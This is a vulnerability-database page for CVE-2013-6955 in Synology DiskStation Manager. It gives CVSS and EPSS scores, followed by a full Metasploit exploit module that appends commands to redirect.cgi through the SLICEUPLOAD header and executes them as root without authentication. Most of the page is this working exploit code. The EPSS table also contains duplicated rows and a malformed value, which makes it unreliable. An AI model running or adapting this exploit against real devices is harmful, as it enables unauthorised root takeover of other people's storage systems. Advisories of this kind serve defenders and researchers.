CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1 allows remote attackers to append data to arbitrary files, and consequently execute arbitrary code, via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header.
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
75.8%
–
–
2023-03-12
–
–
–
97.32%
–
2023-07-09
–
–
–
97.37%
–
2023-08-27
–
–
–
97.34%
–
2023-11-26
–
–
–
97.29%
–
2024-04-14
–
–
–
97.3%
–
2024-06-02
–
–
–
97.3%
–
2024-06-09
–
–
–
97.33%
–
2024-07-28
–
–
–
97.25%
–
2024-12-08
–
–
–
97.22%
–
2024-12-22
–
–
–
96.97%
–
2025-02-02
–
–
–
96.74%
–
2025-01-19
–
–
–
96.97%
–
2025-02-02
–
–
–
96.74%
–
2025-03-18
–
–
–
–
88.18%
2025-03-18
–
–
–
–
88.18,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
&junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x
def initialize(info={})
super(update_info(info,
'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
'Description' => %q{
This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
versions 4.x, which allows the execution of arbitrary commands under root
privileges.
The vulnerability is located in /webman/imageSelector.cgi, which allows to append
arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
can be triggered by an unauthenticated user with a specially crafted HTTP request.
This is exploited by this module to append the given commands to /redirect.cgi,
which is a regular shell script file, and can be invoked with another HTTP request.
Synology reported that the vulnerability has been fixed with versions 4.0-2259,
4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
},
'Author' =>
[
'Markus Wulftange' # Discovery, Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6955' ],
],
'Privileged' => false,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'DisableNops' => true,
'Space' => 0x31337,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', {}]
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 31 2013'
))
register_options(
[
Opt::RPORT(5000)
], self.class)
end
def check
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('webman', 'info.cgi'),
'vars_get' => { 'host' => ''}
})
if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
version = "#{$~[:major]}.#{$~[:minor]}"
build = $~[:build]
model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
model = "DS#{model}" unless model =~ /^[A-Z]/
else
print_status("#{peer} - Detection failed")
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")
case version
when '4.0'
return Exploit::CheckCode::Vulnerable if build < '2259'
when '4.1'
return Exploit::CheckCode::Vulnerable
when '4.2'
return Exploit::CheckCode::Vulnerable if build < '3243'
when '4.3'
return Exploit::CheckCode::Vulnerable if build < '3810'
return Exploit::CheckCode::Detected if build == '3810'
end
Exploit::CheckCode::Safe
end
def exploit
cmds = [
# sed is used to restore the redirect.cgi
"sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
payload.encoded
].join("\n")
mime_msg = Rex::MIME::Message.new
mime_msg.add_part('login', nil, nil, 'form-data; name="source"')
mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')
# unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
# so we use a placeholder and replace it later
cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
'form-data; name="foo"; filename="bar"')
post_body = mime_msg.to_s
post_body.strip!
post_body.sub!(cmd_placeholder, cmds)
# fix multipart encoding
post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1')
# send request to append shell commands
print_status("#{peer} - Injecting the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('webman', 'imageSelector.cgi'),
'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}",
'headers' => {
'X-TYPE-NAME' => 'SLICEUPLOAD',
'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi'
},
'data' => post_body
})
unless res and res.code == 200 and res.body.include?('error_noprivilege')
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
end
# send request to invoke the injected shell commands
print_status("#{peer} - Executing the payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('redirect.cgi'),
})
# Read command output if cmd/unix/generic payload was used
if datastore['CMD']
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
end
print_good("#{peer} - Command successfully executed")
print_line(res.body)
end
end
end